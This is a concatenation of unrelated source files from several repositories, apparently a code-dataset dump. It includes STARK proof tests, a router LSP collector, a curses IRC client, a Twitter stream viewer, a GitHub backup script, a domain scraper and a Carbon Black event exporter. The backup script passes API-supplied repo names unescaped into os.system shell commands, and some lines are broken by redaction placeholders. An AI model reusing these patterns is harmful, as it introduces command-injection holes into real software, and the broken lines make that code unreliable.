proof_stream = ProofStream()
for i in range(0, degree//3):
codeword[i] = field.zero()
fri.prove(codeword, proof_stream)
points = []
assert False == fri.verify(proof_stream, points), "proof should fail, but is accepted ..."
print("success! \\o/")
```
#### File: stark-anatomy/code/test_multivariate.py
```python
from multivariate import *
def test_evaluate( ):
field = Field.main()
variables = MPolynomial.variables(4, field)
zero = field.zero()
one = field.one()
two = FieldElement(2, field)
five = FieldElement(5, field)
mpoly1 = MPolynomial.constant(one) * variables[0] + MPolynomial.constant(two) * variables[1] + MPolynomial.constant(five) * (variables[2]^3)
mpoly2 = MPolynomial.constant(one) * variables[0] * variables[3] + MPolynomial.constant(five) * (variables[3]^3) + MPolynomial.constant(five)
mpoly3 = mpoly1 * mpoly2
point = [zero, five, five, two]
eval1 = mpoly1.evaluate(point)
eval2 = mpoly2.evaluate(point)
eval3 = mpoly3.evaluate(point)
assert(eval1 * eval2 == eval3), "multivariate polynomial multiplication does not commute with evaluation"
assert(eval1 + eval2 == (mpoly1 + mpoly2).evaluate(point)), "multivariate polynomial addition does not commute with evaluation"
print("eval3:", eval3.value)
print("multivariate evaluate test success \\o/")
def test_lift( ):
field = Field.main()
variables = MPolynomial.variables(4, field)
zero = field.zero()
one = field.one()
two = FieldElement(2, field)
five = FieldElement(5, field)
upoly = Polynomial.interpolate_domain([zero, one, two], [two, five, five])
mpoly = MPolynomial.lift(upoly, 3)
assert(upoly.evaluate(five) == mpoly.evaluate([zero, zero, zero, five])), "lifting univariate to multivariate failed"
print("lifting univariate to multivariate polynomial success \\o/")
``` |
{
"source": "3fr61n/netflow-correlator",
"score": 2
} |
#### File: network-rib/data/lsp-install-collector.py
```python
import warnings
with warnings.catch_warnings(record=True) as w:
import paramiko
import multiprocessing
from datetime import datetime
import re
import netmiko
from netmiko.ssh_exception import NetMikoTimeoutException, NetMikoAuthenticationException
import pytricia
import pprint
import os
import sys
import json
# DEVICE_CREDS contains the devices to connect to
from DEVICE_CREDS import all_devices
def worker_commands(a_device, mp_queue):
try:
a_device['port']
except KeyError:
a_device['port'] = 22
identifier = '{ip}'.format(**a_device)
return_data = {}
cmd = ''
command_jnpr = 'show configuration protocols mpls | display set'
command_csco = 'show running-config formal interface | i tunnel'
SSHClass = netmiko.ssh_dispatcher(a_device['device_type'])
try:
net_connect = SSHClass(**a_device)
if net_connect.device_type == 'juniper':
cmd = net_connect.send_command(command_jnpr)
elif net_connect.device_type == 'cisco_ios':
cmd = net_connect.send_command(command_csco)
except (NetMikoTimeoutException, NetMikoAuthenticationException) as e:
return_data[identifier] = False
# Add data to the queue (for parent process)
mp_queue.put(return_data)
return None
#print cmd
return_data[identifier] = pytricia.PyTricia()
return_data[identifier] = generate_json(cmd,identifier,net_connect.device_type)
mp_queue.put(return_data)
def generate_json(cmd,ip_host,device_type):
rib = {}
install = None
lsp_name = None
if device_type == 'juniper':
################### JNPR REGEX #############################
regex_install = "(?:install)(\s+\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{2})"
match_install = re.search(regex_install, cmd,re.MULTILINE)
if match_install:
install = match_install.group(1).strip().split('/')[0]
regex_endpoint = "(?:to)(\s+\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
match_endpoint = re.findall(regex_endpoint, cmd,re.MULTILINE)
regex_lsp_name = "(?:label-switched-path).(.*?\s+)"
match_lsp_name = re.search(regex_lsp_name, cmd,re.MULTILINE)
if match_lsp_name:
lsp_name = match_lsp_name.group(1).strip()
else:
################### CISCO REGEX #############################
cisco_lsp_name = "(?:signalled-name)(\s+.*)"
regex_cisco_lsp_name = re.search(cisco_lsp_name, cmd,re.MULTILINE)
if regex_cisco_lsp_name:
lsp_name = regex_cisco_lsp_name.group(1).strip()
cisco_install = "(?:autoroute)(?: destination)(.*)"
regex_cisco_install = re.search(cisco_install, cmd,re.MULTILINE)
if regex_cisco_install:
install = regex_cisco_install.group(1).strip()
cisco_endpoint = "(?:tunnel-te[0-9]+)(?: destination)(.*)"
match_endpoint = re.findall(cisco_endpoint, cmd,re.MULTILINE)
#match_endpoint = regex_cisco_endpoint.group(1).strip()
rib[install] = {'install':install,'endpoint':match_endpoint,'lsp_name':lsp_name}
return rib
def main():
if getattr(sys, 'frozen', False):
# frozen
BASE_DIR = os.path.dirname(sys.executable)
else:
# unfrozen
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
dirpath = BASE_DIR + '/lsp-install/'
filename = 'lsp_install.json'
# Create directory if does not exist
if not os.path.exists (dirpath):
os.makedirs (dirpath,mode=0777)
install = {}
path = os.path.join (dirpath,filename)
results = []
mp_queue = multiprocessing.Queue()
processes = []
for a_device in all_devices:
p = multiprocessing.Process(target=worker_commands, args=(a_device, mp_queue))
processes.append(p)
# start the work process
p.start()
# wait until the child processes have completed
for p in processes:
p.join()
# retrieve all the data from the queue
for p in processes:
results.append(mp_queue.get())
for i in results:
install.update(i)
with open (path,'w') as outfile:
json.dump(install,outfile)
if __name__ == '__main__':
main()
``` |
{
"source": "3ft9/twicli",
"score": 3
} |
#### File: twicli/src/irc.py
```python
import curses
import select
import socket
import sys
import textwrap
import time
import re
class CursesUI:
"""
May have a problem with inbound messages while typing - blocks the display of new data while typing.
(the select.select() call triggers on the first keypress but blocks until newline. too lazy to write
an internal buffer to pick up on characters as they are typed. :> )
More to the point, the UI doesn't seem to be doing a 100% good job of splitting up the input. Occasionally
messages inbound will not get parsed - this seems to be when multiple items arrive at once.
Also, server messages (large and all-at-once) are not parsing properly.
Parts are inspired from http://twistedmatrix.com/documents/current/examples/cursesclient.py
"""
def __init__(self, irceng):
"""
Input param:
socket - open socket to IRC server
irceng - IRC engine object
"""
self.lines = []
self.engine = irceng
self.sock = self.engine.connect()
self.linewrap = textwrap.TextWrapper()
self.stdscr = curses.wrapper(self.evtloop)
def addline(self, line, screen):
# First part sanitizes input for the screen - break input buffer into lines (\n), then into
# screen lines based on width
line = line.rstrip()
actuallines = line.split("\n")
for entry in actuallines:
try:
entry = self.engine.parseinput(entry)
except PingInputError, err:
self.sock.sendall("PONG :" + err.value + "\n")
entry = "PING/PONG to " + err.value
screenlines = self.linewrap.wrap(entry)
for item in screenlines:
self.lines.append(item)
# Now we clear the screen and loop over the formatted lines to display them.
screen.clear()
i = 0;
index = len(self.lines) - 1
while i < self.nrows - 2 and index >= 0:
screen.addstr(self.nrows-2-i, 0, self.lines[index])
i = i + 1
index = index - 1
screen.move(self.nrows-1, 0)
screen.refresh()
def evtloop(self, screen):
curses.echo()
self.nrows, self.ncols = screen.getmaxyx()
self.linewrap.width = self.ncols
while True:
(inlst, outlst, errlst) = select.select([self.sock, sys.stdin], [], [])
if self.sock in inlst :
# data coming in
data = self.sock.recv(8192)
if len(data) > 0:
# self.addline(self.engine.parseinput(data), screen)
# Moving the parseinput() call to addline()
self.addline(data, screen)
else :
# No data from socket - socket may be closed
# Test this and exit gracefully if needed
try :
self.sock.sendall("PING\n")
except socket.error :
print "Socket closed by host."
break
elif sys.stdin in inlst :
# keyboard data to be sent
data = self.engine.parsecmd(screen.getstr())
self.sock.sendall(data + "\n")
self.addline(data, screen)
def close(self):
self.engine.shutdown()
class PythonIRC:
def __init__(self, svr="irc.freenode.net", prt=6667, nck="PythIRC", rname="Python-IRC User"):
self.server = svr
self.port = prt
self.nick = nck
self.realname = rname
self.channel = ""
self.usercmd = re.compile('^/(\w+)( (.*))?$')
self.usermsg = re.compile('^(#?\w+)( (.*))?$')
self.svrmsg = re.compile('^:([a-zA-Z0-9\.]+) [0-9]+ ' + self.nick + '(.*)')
self.chanmsg = re.compile('^:(.+)![~]?(.+)@(.+) (\w+) #?(\w+) :(.*)$')
self.genmsg = re.compile('^:(.+)!~?(.+)@([a-zA-Z0-9\-\.]+) (\w+) :?(.*)$')
self.pingmsg = re.compile('^PING :(.*)$', re.IGNORECASE)
def connect(self):
# Connect to the IRC server.
# ... insert socket code here ...
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.server, self.port))
# ... add error handling for the commands?
nickcmd = "NICK " + self.nick + "\n"
usercmd = "USER Python-IRC host server :" + self.realname + "\n" # Might want to not hardcode those
self.sock.sendall(nickcmd) # Need to check for collision here
self.sock.sendall(usercmd) # Watch for errors here
return self.sock # The established connection
def parseinput(self, input):
if self.svrmsg.match(input) is not None:
# Server message
parse = self.svrmsg.match(input)
result = parse.group(1) + ": " + parse.group(2)
elif self.chanmsg.match(input) is not None:
# Channel msg
parse = self.chanmsg.match(input)
if parse.group(4).upper() == "PRIVMSG":
result = "[#" + parse.group(5) + " || " + parse.group(1) + "]: " + parse.group(6)
else:
# Unhandled
result = input.rstrip()
elif self.genmsg.match(input) is not None:
# General messages
parse = self.genmsg.match(input)
if parse.group(4).upper() == "QUIT":
result = "-- " + parse.group(1) + " has quit: " + parse.group(5)
elif parse.group(4).upper() == "JOIN":
result = "++ " + parse.group(1) + " has joined " + parse.group(5)
elif parse.group(4).upper() == "NICK":
result = "-+ " + parse.group(1) + " has morphed into " + parse.group(5)
else:
# Unhandled input
result = input.rstrip()
elif self.pingmsg.match(input):
parse = self.pingmsg.match(input)
raise PingInputError, parse.group(1)
else:
# Unhandled input
result = input.rstrip()
return result
def parsecmd(self, input):
"""
This function parses user supplied input and reformats into IRC commands
"""
# If first char is a /, then this is a command.
output = input
if input[0] == "/" :
parsedcmd = self.usercmd.match(input)
output = parsedcmd.group(1).upper() # group(0) is the raw match, not the group
# Insert a bunch of if..elif..else statements
if (output == "MSG") :
# private message to a user. format: /msg user text
# break off the first word of group(3) to get userid
splitcmd = self.usermsg.match(parsedcmd.group(3))
output = "PRIVMSG " + splitcmd.group(1) + " :" + splitcmd.group(3) # Note - no error checking for existence of groups
elif (output == "JOIN") :
# Only supports one channel, no keys, at this time
if parsedcmd.group(3) is not None:
output = output + " " + parsedcmd.group(3) # Note - group(2) contains that space
# Store channel for later use
self.channel = parsedcmd.group(3)
else :
# Raise a USER=ID10T error
pass
elif (output == "QUIT") :
# map add'l params i.e. reason for quitting
if parsedcmd.group(3) is not None:
output = output + " :" + parsedcmd.group(3)
elif (output == "PART") :
# add'l param = channel to leave
if parsedcmd.group(3) is not None:
output = output + " " + parsedcmd.group(3)
elif (output == "NICK") :
output = "NICK " + parsedcmd.group(3)
elif input[0] == "#" :
splitcmd = self.usermsg.match(input)
output = "PRIVMSG " + splitcmd.group(1) + " :" + splitcmd.group(3)
self.channel = splitcmd.group(1) # Update the CHANNEL variable - allows for easier multiple messages
else :
# This is a msg for a channel.
# look for null input!
output = "PRIVMSG " + self.channel + " :" + output # Retrieves channel from above
return output.rstrip()
def shutdown(self):
self.sock.close()
class PingInputError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def usage():
print("Python-IRC (c) 2004 <NAME>. Some rights reserved (http://creativecommons.org)")
print("USAGE: " + sys.argv[0] + " server port nick realname")
if (__name__ == "__main__"):
# Expect server port nick realname
if len(sys.argv) != 5:
usage()
else:
client = PythonIRC(svr=sys.argv[1], prt=int(sys.argv[2]), nck=sys.argv[3], rname=sys.argv[4])
cursesui = CursesUI(client)
# Event loop happens ... need more graceful way
cursesui.close()
```
#### File: twicli/src/streamcatcher.py
```python
from twython import TwythonStreamer
import curses
import textwrap
import HTMLParser
class StreamCatcher(TwythonStreamer):
def start(self):
self.htmlparser = HTMLParser.HTMLParser()
self.lines = []
self.linewrap = textwrap.TextWrapper()
try:
self.stdscr = curses.wrapper(self._run)
except KeyboardInterrupt:
self.disconnect()
def _run(self, screen):
curses.start_color()
curses.use_default_colors()
curses.echo()
self.nrows, self.ncols = screen.getmaxyx()
self.linewrap.width = self.ncols
self._screen = screen
self._addline('=> Connected!')
self.user(replies=all)
def _addline(self, line):
# First part sanitizes input for the screen - break input buffer into lines
# (\n), then into screen lines based on width
line = line.rstrip()
actuallines = line.split("\n")
for entry in actuallines:
screenlines = self.linewrap.wrap(entry)
for item in screenlines:
self.lines.append(item)
# Now we clear the screen and loop over the formatted lines to display them.
self._screen.clear()
i = 0;
index = len(self.lines) - 1
while i < self.nrows - 2 and index >= 0:
self._screen.addstr(self.nrows-2-i, 0, self.lines[index])
i = i + 1
index = index - 1
self._screen.move(self.nrows-1, 0)
self._screen.refresh()
def on_success(self, data):
if 'text' in data:
self._addline(data['user']['name'].encode('utf-8') + ' [' + data['user']['screen_name'].encode('utf-8') + ']: ' + self.htmlparser.unescape(data['text']).decode('utf-8'))
elif 'friends' in data:
num = len(data['friends'])
self._addline('=> You are following ' + str(num) + ' user' + ('' if num == 1 else 's'))
else:
self._addline('Received: ' + str(data))
def on_error(self, status_code, data):
self._addline('ERR: [' + str(status_code) + '] ' + data)
``` |
{
"source": "3gbywork/BackupRepos",
"score": 3
} |
#### File: 3gbywork/BackupRepos/backupRepos.py
```python
import urllib.request
import base64
import json
import io
import os
import sys
# personal public access token
USER=''
TOKEN=''
GIT_API_URL='https://api.github.com'
def main(argv):
if len(argv) > 1:
user=argv[1]
else:
user=input("enter username: ").strip()
if not user:
print("username can't be null")
sys.exit(1)
print("\n================================")
print("list public repos for the user: %s" % user)
repos=getRepos(user)
for name,url in repos:
print("name: %-30s url: %s" % (name,url))
print("================================\n")
input("press enter to clone or update all repos...")
cloneOrUpdateRepos(repos)
def cloneOrUpdateRepos(repos):
for name,url in repos:
print("\n================================")
if os.path.exists(name):
print("repo: %s has exists, will update" % name)
os.system("cd %s & git pull" % name)
else:
print("repo: %s not exists, will clone" % name)
os.system("git clone %s" % url)
print("================================\n")
def getRepos(user):
resp = getApi('/users/%s/repos' % user)
return [(x["name"],x["clone_url"]) for x in json.load(io.StringIO(resp))]
def getApi(url):
try:
req=urllib.request.Request(GIT_API_URL+url)
if USER and TOKEN:
print("authorization with %s-%s" % (USER, TOKEN))
b64str=base64.encodestring(bytes('%s/token:%s' % (USER, TOKEN), 'utf-8')).decode('utf-8').replace('\n', '')
req.add_header("Authorization", "Basic %s" % b64str)
resp=urllib.request.urlopen(req)
cnt=resp.read().decode('utf-8')
resp.close()
return cnt
except:
print('failed to get api request from %s' % url)
if __name__ == "__main__":
try:
main(sys.argv)
except KeyboardInterrupt:
sys.exit(2)
``` |
{
"source": "3gbywork/PythonChallengeStrategy",
"score": 3
} |
#### File: Code/Python/Challenge008.py
```python
def makeBz2(filename, data):
fp=open(filename, 'wb')
fp.write(data)
fp.close()
import helper
dir=".\\Data\\008"
helper.ensureDir(dir)
un=b'BZh91AY&SYA\xaf\x82\r\x00\x00\x01\x01\x80\x02\xc0\x02\x00 \x00!\x9ah3M\x07<]\xc9\x14\xe1BA\x06\xbe\x084'
pw=b'<PASSWORD>&<PASSWORD>$|\x0e\x00\x00\x00\x81\x00\x03$ \x00!\x9ah3M\x13<]\xc9\x14\xe1BBP\x91\xf08'
makeBz2(dir+'\\user.bz2', un)
makeBz2(dir+'\\pwd.bz2', pw)
# ================================
import codecs
username=codecs.decode(un, 'bz2').decode('utf-8')
password=codecs.decode(pw, 'bz2').decode('utf-8')
# or
# username=codecs.decode(open(dir+'\\user.bz2','rb').read(), 'bz2').decode('utf-8')
# password=codecs.decode(open(dir+'\\pwd.bz2','rb').read(), 'bz2').decode('utf-8')
print('username: %s\npassword: %s' % (username, password))
```
#### File: Code/Python/helper.py
```python
def readFile(filename):
fp=open(filename)
content=fp.read()
fp.close()
return content
def ensureDir(dir):
import os
if not os.path.exists(dir):
os.mkdir(dir)
def installHTTPBasicAuthOpener(user, passwd):
import urllib.request
auth_handler=urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password("inflate", "http://www.pythonchallenge.com", user, passwd)
opener=urllib.request.build_opener(auth_handler)
urllib.request.install_opener(opener)
``` |
{
"source": "3gstudent/GetExpiredDomains",
"score": 3
} |
#### File: 3gstudent/GetExpiredDomains/GetExpiredDomains.py
```python
import urllib
import urllib2
import sys
from bs4 import BeautifulSoup
def GetResults(loop,key):
for i in range(1,loop):
print "[+]Page %d" %(i+1)
url = "https://www.expireddomains.net/domain-name-search/?start=" + str(25*i) + "&q="+ key
#print url
req = urllib2.Request(url)
#req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36")
res_data = urllib2.urlopen(req)
html = BeautifulSoup(res_data.read(), "html.parser")
tds = html.findAll("td", {"class": "field_domain"})
for td in tds:
print td.findAll("a")[0]["title"]
def SearchExpireddomains(key):
url = "https://www.expireddomains.net/domain-name-search/?q=" + key
req = urllib2.Request(url)
#req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36")
res_data = urllib2.urlopen(req)
html = BeautifulSoup(res_data.read(), "html.parser")
Result = html.select('strong')[0].text.replace(',', '')
print "[*]Total results: %s" % Result
if int(Result) <25:
return
elif int(Result) > 550:
print "[!]Too many results,only get 550 result."
print "[*]21 requests will be sent."
print "[+]Page 1"
tds = html.findAll("td", {"class": "field_domain"})
for td in tds:
print td.findAll("a")[0]["title"]
GetResults(21,key)
else:
print "[*]%d requests will be sent." % (int(Result)/25+1)
print "[+]Page 1"
tds = html.findAll("td", {"class": "field_domain"})
for td in tds:
print td.findAll("a")[0]["title"]
GetResults(int(Result)/25+1,key)
if __name__ == "__main__":
print "GetExpiredDomains - Search for available domain from expireddomains.net"
print "Author: 3gstudent\n"
if len(sys.argv)!=2:
print ('Usage:')
print (' GetExpiredDomains.py <Search String>')
sys.exit(0)
SearchExpireddomains(sys.argv[1])
print "[*]All Done"
``` |
{
"source": "3h4x/cb-event-forwarder",
"score": 2
} |
#### File: test/scripts/export_raw_events.py
```python
import collections
import os
import re
import sys
import optparse
import pika
sensorid_to_details_map = {}
cbapi = {}
g_output = None
g_config = {}
class EventOutput(object):
DESTINATIONS = ['udp', 'tcp', 'file', 'stdout', 's3']
def __init__(self, out_dest):
if out_dest not in EventOutput.DESTINATIONS:
raise ValueError("output destination (%s) not a valid destination value" % out_dest)
self.dest = out_dest
def output(self, mime_type, routing_key, eventdata, header_frame):
raise Exception("Not Implemented")
class RawEventOutput(EventOutput):
def __init__(self, outdir):
super(RawEventOutput, self).__init__('file')
self.destdir = outdir
self.types = []
os.makedirs(outdir, 0700)
self.count = 0
def output(self, mime_type, routing_key, eventdata, header_frame):
if mime_type not in self.types:
os.mkdir(os.path.join(self.destdir, mime_type), 0700)
self.types.append(mime_type)
open(os.path.join(self.destdir, mime_type,
"%d.%s" % (self.count, mime_type)),
'wb').write(eventdata)
open(os.path.join(self.destdir, mime_type, "%d.txt" % self.count), 'wb').write(str(header_frame))
self.count += 1
def get_stats(self):
return self.count
def get_mq_user_from_cbconf():
for line in open('/etc/cb/cb.conf').readlines():
if line.strip().startswith('RabbitMQUser'):
return line.split('=')[1].strip()
def get_mq_pass_from_cbconf():
for line in open('/etc/cb/cb.conf').readlines():
if line.strip().startswith('RabbitMQPassword'):
return line.split('=')[1].strip()
def on_bus_msg(channel, method_frame, header_frame, body):
"""callback that gets called for any event on the CB pub/sub event bus"""
try:
if not header_frame.content_type.startswith("application/"):
sys.stderr.write("-> Unexpected data type %s\n" % header_frame.content_type)
sys.stderr.flush()
else:
g_output.output(header_frame.content_type.replace("application/", ""), method_frame.routing_key, body, header_frame)
except Exception, e:
sys.stderr.write("-> Exception processing bus msg: %s\n" % e)
def bus_event_loop(cb_hostname, rabbit_mq_user, rabbit_mq_pass):
credentials = pika.PlainCredentials(rabbit_mq_user, rabbit_mq_pass)
parameters = pika.ConnectionParameters(cb_hostname,
5004,
'/',
credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
queue_name = 'raw_event_exporter_pid_%d' % os.getpid()
# make sure you use auto_delete so the queue isn't left filling
# with events when this program exists.
channel.queue_declare(queue=queue_name, auto_delete=True)
channel.exchange_declare(type='fanout', exchange='api.rawsensordata', durable=True, auto_delete=False,
passive=False)
channel.queue_bind(exchange='api.rawsensordata', queue=queue_name)
channel.basic_consume(on_bus_msg, queue=queue_name, no_ack=True)
sys.stderr.write("-> Subscribed to Pub/Sub bus (press Ctl-C to quit)\n")
sys.stderr.flush()
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
connection.close()
def build_cli_parser():
parser = optparse.OptionParser(usage="%prog [options]", description="Process Cb Response Sensor Event Logs")
#
# CB server info (needed for host information lookups)
#
group = optparse.OptionGroup(parser, "CB server options")
group.add_option("-c", "--cburl", action="store", default=None, dest="url",
help="CB server's URL. e.g., http://127.0.0.1; only useful when -A is specified")
group.add_option("-a", "--apitoken", action="store", default=None, dest="token",
help="API Token for Cb Response server; only useful when -A and -c are specified")
group.add_option("-n", "--no-ssl-verify", action="store_false", default=True, dest="ssl_verify",
help="Do not verify server SSL certificate; only useful when -c is specified.")
parser.add_option_group(group)
#
# Bus options
#
group = optparse.OptionGroup(parser, "CB Bus connection options")
group.add_option("-u", "--user", action="store", default=None, dest="user",
help="The username for the rabbitMQ pub/sub event bus (default is to pull it from config)")
group.add_option("-p", "--pass", action="store", default=None, dest="pwd",
help="The password for the rabbitMQ pub/sub event bus (default is to pull it from config)")
parser.add_option_group(group)
#
# Output options (ie - where do we put the formatted events and how are they formatted)
#
group = optparse.OptionGroup(parser, "Output options",
"Output options for events that control both the formatting and destination")
group.add_option("-d", "--directory", action="store", default=None, dest="outdir",
help="Write the raw events to a directory")
parser.add_option_group(group)
return parser
if __name__ == '__main__':
parser = build_cli_parser()
opts, args = parser.parse_args(sys.argv)
cbhost = None
if opts.url:
cbapi['url'] = opts.url
hostmatch = re.compile('https?://([^/]+)/?').match(opts.url)
if hostmatch:
cbhost = hostmatch.group(1)
if not opts.outdir:
parser.error("Output directory is required")
# output processing
g_output = RawEventOutput(opts.outdir)
user = opts.user
pwd = <PASSWORD>
if not user:
user = get_mq_user_from_cbconf()
if not pwd:
pwd = get_mq_pass_from_cbconf()
if not cbhost:
cbhost = 'localhost'
bus_event_loop(cbhost, user, pwd)
``` |
{
"source": "3HeadedSnake/darajaapp",
"score": 2
} |
#### File: mpesa/api/views.py
```python
from rest_framework.generics import CreateAPIView
from rest_framework.permissions import AllowAny
from mpesa.api.serializers import LNMOnlineSerializer, C2BPaymentSerializer
from mpesa.models import LNMOnline, C2BPayments
from rest_framework.response import Response
class LNMCallbackUrlAPIView(CreateAPIView):
queryset = LNMOnline.objects.all()
serializer_class = LNMOnlineSerializer
permission_classes = [AllowAny]
def create(self, request):
print (request.data,"This is request.data")
merchant_request_id = request.data["Body"]["stkCallback"]["MerchantRequestID"]
checkout_request_id = request.data["Body"]["stkCallback"]["CheckoutRequestID"]
result_code = request.data["Body"]["stkCallback"]["ResultCode"]
result_description = request.data["Body"]["stkCallback"]["ResultDesc"]
amount = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][0]['Value']
mpesa_receipt_number = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][1]['Value']
balance = ""
transaction_date = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][3]['Value']
phone_number = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][4]['Value']
from datetime import datetime
str_transaction_date = str(transaction_date)
transaction_datetime = datetime.strptime(str_transaction_date, "%Y%m%d%H%M%S")
import pytz
my_transaction_datetime = pytz.utc.localize(transaction_datetime)
from mpesa.models import LNMOnline
our_model = LNMOnline.objects.create(
CheckoutRequestID = checkout_request_id,
MerchantRequestID = merchant_request_id,
Amount = amount,
ResultCode = result_code,
ResultDesc = result_description,
MpesaReceiptNumber = mpesa_receipt_number,
Balance = balance,
TransactionDate = my_transaction_datetime,
PhoneNumber = phone_number,
)
our_model.save()
return Response ({"OurResultDesc":"SUCCESSFUL"})
class C2BValidationAPIView(CreateAPIView):
queryset = C2BPayments.objects.all()
serializer_class = C2BPaymentSerializer
permission_classes = [AllowAny]
def create(self, request):
from rest_framework.response import Response
my_headers = self.get_success_headers(request.data)
return Response({"ResultCode":0})
class C2BConfirmationAPIView(CreateAPIView):
queryset = C2BPayments.objects.all()
serializer_class = C2BPaymentSerializer
permission_classes = [AllowAny]
def create(self, request):
from rest_framework.response import Response
return Response({"ResultDesc": 0})
``` |
{
"source": "3HeadedSnake/django_analytics",
"score": 2
} |
#### File: django_analytics/dashboard/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
from dashboard.models import Order
from django.core import serializers
# Directs user to the dashboard/templates
def dashboard_with_pivot(request):
return render(request, 'dashboard_with_pivot.html', {})
# Sends response to the pivot table
def pivot_data(request):
dataset = Order.objects.all()
data = serializers.serialize('json', dataset)
return JsonResponse(data, safe=False)
``` |
{
"source": "3huo/Hand-Pointnet",
"score": 2
} |
#### File: Hand-Pointnet/train_eval/dataset.py
```python
import torch.utils.data as data
import os
import os.path
import torch
import numpy as np
import scipy.io as sio
import pdb
SAMPLE_NUM = 1024
JOINT_NUM = 21
subject_names = ["P0", "P1", "P2", "P3", "P4", "P5", "P6", "P7", "P8"]
gesture_names = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "I", "IP", "L", "MP", "RP", "T", "TIP", "Y"]
class HandPointDataset(data.Dataset):
def __init__(self, root_path, opt, train=True):
self.root_path = root_path
self.train = train
self.size = opt.size
self.test_index = opt.test_index
self.PCA_SZ = opt.PCA_SZ
self.SAMPLE_NUM = opt.SAMPLE_NUM
self.INPUT_FEATURE_NUM = opt.INPUT_FEATURE_NUM
self.JOINT_NUM = opt.JOINT_NUM
if self.size == 'full':
self.SUBJECT_NUM = 9
self.GESTURE_NUM = 17
elif self.size == 'small':
self.SUBJECT_NUM = 3
self.GESTURE_NUM = 2
self.total_frame_num = self.__total_frmae_num()
self.point_clouds = np.empty(shape=[self.total_frame_num, self.SAMPLE_NUM, self.INPUT_FEATURE_NUM],
dtype=np.float32)
self.volume_length = np.empty(shape=[self.total_frame_num, 1], dtype=np.float32)
self.gt_xyz = np.empty(shape=[self.total_frame_num, self.JOINT_NUM, 3], dtype=np.float32)
self.valid = np.empty(shape=[self.total_frame_num, 1], dtype=np.float32)
self.start_index = 0
self.end_index = 0
if self.train: # train
for i_subject in range(self.SUBJECT_NUM):
if i_subject != self.test_index:
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[i_subject], gesture_names[i_gesture])
print("Training: " + cur_data_dir)
self.__loaddata(cur_data_dir)
else: # test
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[self.test_index], gesture_names[i_gesture])
print("Testing: " + cur_data_dir)
self.__loaddata(cur_data_dir)
self.point_clouds = torch.from_numpy(self.point_clouds)
self.volume_length = torch.from_numpy(self.volume_length)
self.gt_xyz = torch.from_numpy(self.gt_xyz)
self.valid = torch.from_numpy(self.valid)
self.gt_xyz = self.gt_xyz.view(self.total_frame_num, -1)
valid_ind = torch.nonzero(self.valid)
valid_ind = valid_ind.select(1, 0)
self.point_clouds = self.point_clouds.index_select(0, valid_ind.long())
self.volume_length = self.volume_length.index_select(0, valid_ind.long())
self.gt_xyz = self.gt_xyz.index_select(0, valid_ind.long())
self.total_frame_num = self.point_clouds.size(0)
# load PCA coeff
PCA_data_path = os.path.join(self.root_path, subject_names[self.test_index])
print("PCA_data_path: " + PCA_data_path)
PCA_coeff_mat = sio.loadmat(os.path.join(PCA_data_path, 'PCA_coeff.mat'))
self.PCA_coeff = torch.from_numpy(PCA_coeff_mat['PCA_coeff'][:, 0:self.PCA_SZ].astype(np.float32))
PCA_mean_mat = sio.loadmat(os.path.join(PCA_data_path, 'PCA_mean_xyz.mat'))
self.PCA_mean = torch.from_numpy(PCA_mean_mat['PCA_mean_xyz'].astype(np.float32))
tmp = self.PCA_mean.expand(self.total_frame_num, self.JOINT_NUM * 3)
tmp_demean = self.gt_xyz - tmp
self.gt_pca = torch.mm(tmp_demean, self.PCA_coeff)
self.PCA_coeff = self.PCA_coeff.transpose(0, 1).cuda()
self.PCA_mean = self.PCA_mean.cuda()
def __getitem__(self, index):
return self.point_clouds[index, :, :], self.volume_length[index], self.gt_pca[index, :], self.gt_xyz[index, :]
def __len__(self):
return self.point_clouds.size(0)
def __loaddata(self, data_dir):
point_cloud = sio.loadmat(os.path.join(data_dir, 'Point_Cloud_FPS.mat'))
gt_data = sio.loadmat(os.path.join(data_dir, "Volume_GT_XYZ.mat"))
volume_length = sio.loadmat(os.path.join(data_dir, "Volume_length.mat"))
valid = sio.loadmat(os.path.join(data_dir, "valid.mat"))
self.start_index = self.end_index + 1
self.end_index = self.end_index + len(point_cloud['Point_Cloud_FPS'])
self.point_clouds[(self.start_index - 1):self.end_index, :, :] = point_cloud['Point_Cloud_FPS'].astype(
np.float32)
self.gt_xyz[(self.start_index - 1):self.end_index, :, :] = gt_data['Volume_GT_XYZ'].astype(np.float32)
self.volume_length[(self.start_index - 1):self.end_index, :] = volume_length['Volume_length'].astype(np.float32)
self.valid[(self.start_index - 1):self.end_index, :] = valid['valid'].astype(np.float32)
def __total_frmae_num(self):
frame_num = 0
if self.train: # train
for i_subject in range(self.SUBJECT_NUM):
if i_subject != self.test_index:
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[i_subject], gesture_names[i_gesture])
frame_num = frame_num + self.__get_frmae_num(cur_data_dir)
else: # test
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[self.test_index], gesture_names[i_gesture])
frame_num = frame_num + self.__get_frmae_num(cur_data_dir)
return frame_num
def __get_frmae_num(self, data_dir):
volume_length = sio.loadmat(os.path.join(data_dir, "Volume_length.mat"))
return len(volume_length['Volume_length'])
``` |
{
"source": "3ideas/config_tracker",
"score": 3
} |
#### File: scripts/migration/csv_header_restore.py
